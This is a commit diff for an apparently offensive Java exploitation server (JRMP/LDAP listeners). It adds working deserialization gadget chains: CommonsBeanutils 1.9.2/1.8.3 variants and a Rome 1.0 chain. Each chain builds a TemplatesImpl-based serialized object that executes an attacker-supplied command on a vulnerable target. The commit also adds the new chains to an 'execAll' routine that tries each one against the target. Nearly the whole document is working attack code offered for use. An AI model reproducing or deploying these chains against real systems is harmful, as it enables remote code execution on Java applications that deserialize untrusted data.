111

C3P0ooo · May 3, 2024 · e230c0f · e230c0f
1 parent aea1060
commit e230c0f
Show file tree

Hide file tree

Showing 8 changed files with 126 additions and 2 deletions.
diff --git a/pom.xml b/pom.xml
@@ -80,6 +80,11 @@
             <artifactId>commons-cli</artifactId>
             <version>1.3.1</version>
         </dependency>
+        <dependency>
+            <groupId>commons-beanutils</groupId>
+            <artifactId>commons-beanutils</artifactId>
+            <version>1.9.1</version>
+        </dependency>
         <dependency>
             <groupId>org.springframework</groupId>
             <artifactId>spring-aop</artifactId>
@@ -108,6 +113,12 @@
             <version>3.4.10</version>
         </dependency>
 
+        <dependency>
+            <groupId>rome</groupId>
+            <artifactId>rome</artifactId>
+            <version>1.0</version>
+        </dependency>
+
     </dependencies>
 
 <!--    打包关键代码    -->

diff --git a/src/main/java/org/c3p0ooo/ArgsBean.java b/src/main/java/org/c3p0ooo/ArgsBean.java
@@ -14,6 +14,9 @@ public ArgsBean(){
         map.put("CC4", "CC4");
         map.put("CC6", "CC6");
         map.put("hibernate", "Hibernate_ClassPathXmlApplicationContextExec");
+        map.put("CB192","CB192");
+        map.put("CB183","CB183");
+        map.put("rome","Rome");
         map.put("execAll", "ExecAll");
     }
 

diff --git a/src/main/java/org/c3p0ooo/JRMPListener.java b/src/main/java/org/c3p0ooo/JRMPListener.java
@@ -265,13 +265,15 @@ protected Class<?> resolveClass(ObjectStreamClass desc) throws
         //---------------------------------------
         try {
             Class<?> aClass = Class.forName("org.gadget." + object);
+            payload = null;
             Object o = aClass.getConstructor().newInstance();
             Method getObject = Class.forName("org.gadget.inter.Gadget").getMethod("getObject", String.class);
             getObject.setAccessible(true);
             Object invoke = getObject.invoke(o, cmd);
             payload = invoke;
             System.out.println("尝试利用链："+object);
         }catch (Exception e){
+//            e.printStackTrace();
         }
 
         out.writeByte(TransportConstants.Return);// transport op
@@ -294,6 +296,8 @@ protected Class<?> resolveClass(ObjectStreamClass desc) throws
         oos.flush();
         out.flush();
 
+
+
         this.hadConnection = true;
         synchronized (this.waitLock) {
             this.waitLock.notifyAll();

diff --git a/src/main/java/org/c3p0ooo/LDAPRefServer.java b/src/main/java/org/c3p0ooo/LDAPRefServer.java
@@ -131,7 +131,10 @@ public static void main(String[] args) throws Exception {
                             "groovy (依赖：groovy 2.3.9)\n" +
                             "hibernate (依赖：hibernate 5.x && spring-context && reactor-core)" +
                             "[hibernate为ClassPathXmlApplicationContext执行，'-c'后跟上xml文件WEB地址]\n" +
-                            "execAll (利用链遍历，跑完一次要重新开脚本)" +
+                            "CB192 (依赖：commons-beanutils 1.9.2 && commons-logging 1.2)\n" +
+                            "CB183 (依赖：commons-beanutils 1.8.3 && commons-logging 1.2)\n" +
+                            "rome (依赖：Rome 1.0)" +
+                            "execAll (利用链遍历，跑完一次要重新开脚本，依赖：tomcat)" +
                             "\n\n\n"
                     , options);
         }

diff --git a/src/main/java/org/gadget/CB183.java b/src/main/java/org/gadget/CB183.java
@@ -0,0 +1,28 @@
+package org.gadget;
+
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtField;
+import javassist.LoaderClassPath;
+import org.gadget.inter.Gadget;
+
+import java.util.PriorityQueue;
+
+public class CB183 implements Gadget{
+    @Override
+    public Object getObject(String command) throws Exception {
+        ClassPool classPool = ClassPool.getDefault();
+        classPool.appendClassPath(new LoaderClassPath(Thread.currentThread().getContextClassLoader()));
+        String clsName = "org.apache.commons.beanutils.BeanComparator";
+        CtClass ctClass = classPool.get(clsName);
+        CtField field = CtField.make("private static final long serialVersionUID = -3490850999041592962L;",ctClass);
+        ctClass.addField(field);
+        ctClass.toClass();
+        // 释放对象
+        ctClass.detach();
+
+        PriorityQueue priorityQueue = (PriorityQueue) new CB192().getObject(command);
+
+        return priorityQueue;
+    }
+}
diff --git a/src/main/java/org/gadget/CB192.java b/src/main/java/org/gadget/CB192.java
@@ -0,0 +1,41 @@
+package org.gadget;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import org.apache.commons.beanutils.BeanComparator;
+import org.gadget.inter.Gadget;
+import org.util.TemplateUtils;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.util.Comparator;
+import java.util.PriorityQueue;
+
+public class CB192 implements Gadget {
+
+    @Override
+    public Object getObject(String command) throws Exception {
+        TemplatesImpl template = TemplateUtils.getTemplate(command);
+
+        // 创建序列化对象
+        Class c = Class.forName("java.lang.String$CaseInsensitiveComparator");
+        Constructor constructor = c.getDeclaredConstructor();
+        constructor.setAccessible(true);
+        Comparator comparator = (Comparator<?>) constructor.newInstance();
+        //只传入字符串构造方法，方法内部会调用ComparableComparator.getInstance()，而ComparableComparator为CC包中的类，可传入一个JDK原生的Comparator实现类,使其不在使用ComparableComparator
+        BeanComparator beanComparator = new BeanComparator("outputProperties",comparator);
+        PriorityQueue priorityQueue = new PriorityQueue(beanComparator);
+
+        //设置queue
+        Field queue = priorityQueue.getClass().getDeclaredField("queue");
+        queue.setAccessible(true);
+        Object[] o = (Object[]) queue.get(priorityQueue);
+        o[0] = template;
+        o[1] = "asdf";
+
+        //设置size
+        Field size = priorityQueue.getClass().getDeclaredField("size");
+        size.setAccessible(true);
+        size.set(priorityQueue,2);
+        return priorityQueue;
+    }
+}
diff --git a/src/main/java/org/gadget/ExecAll.java b/src/main/java/org/gadget/ExecAll.java
@@ -14,7 +14,7 @@
 public class ExecAll implements Gadget {
 
     private ResourceRef ref;
-    private String[] gname = {"jackson2","groovy","CC6","CC4","fastjson"};
+    private String[] gname = {"jackson2","groovy","CC6","CC4","fastjson","CB192","rome"};
     private HashMap map = new ArgsBean().getMap();
 
     public ExecAll(String ip, int port){

diff --git a/src/main/java/org/gadget/Rome.java b/src/main/java/org/gadget/Rome.java
@@ -0,0 +1,34 @@
+package org.gadget;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.syndication.feed.impl.EqualsBean;
+import com.sun.syndication.feed.impl.ObjectBean;
+import com.sun.syndication.feed.impl.ToStringBean;
+import org.gadget.inter.Gadget;
+import org.util.TemplateUtils;
+
+import javax.xml.transform.Templates;
+import java.lang.reflect.Field;
+import java.util.HashMap;
+import java.util.Map;
+
+public class Rome implements Gadget {
+    @Override
+    public Object getObject(String command) throws Exception {
+        TemplatesImpl tmpl = TemplateUtils.getTemplate(command);
+        ToStringBean toStringBean = new ToStringBean(Templates.class, tmpl);
+        EqualsBean equalsBean = new EqualsBean(toStringBean.getClass(), toStringBean);
+
+        //先构造正常的ObjectBean对象，put进hashMap
+        ObjectBean objectBean = new ObjectBean("".getClass(), "aaa");
+
+        Map map = new HashMap<>();
+        map.put(objectBean,"asdf");
+
+        //将恶意的EqualsBean对象写入到ObjectBean的_equalsBean属性中
+        Field equalsBean1 = objectBean.getClass().getDeclaredField("_equalsBean");
+        equalsBean1.setAccessible(true);
+        equalsBean1.set(objectBean,equalsBean);
+        return map;
+    }
+}